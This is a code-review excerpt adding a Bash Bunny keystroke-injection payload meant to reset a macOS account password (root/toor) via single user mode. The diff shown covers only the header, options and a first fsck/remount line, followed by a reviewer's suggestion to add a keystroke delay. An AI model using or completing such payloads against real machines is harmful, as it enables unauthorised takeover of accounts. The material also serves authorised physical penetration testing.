payloads/library/credentials/MacSingleUserPasswd/payload.txt

```diff
@@ -0,0 +1,36 @@
+#!/bin/bash
+#
+# Title: MacSingleUserPasswd
+# Description: Automatically resets user password on macOS through single user mode
+# Author: thehappydinoa
+# Version: 1.0.2
+# Category: Credentials
+# Target: macOS
+# Attackmodes: HID
+#
+
+## OPTIONS
+ACCOUNT="root"
+PASSWD="toor"
+
+## ATTACK
+LED STAGE1
+ATTACKMODE HID
+Q STRING /sbin/fsck -y\; /sbin/mount -uw /\; echo "Change switch position now"\;
```

Comment:
I would add a small delay before line 19 so the host machine has time to recognize and accept keystrokes from the bashbunny. 

```
QUACK DELAY 1000
```

Reply:
Great idea, I am on it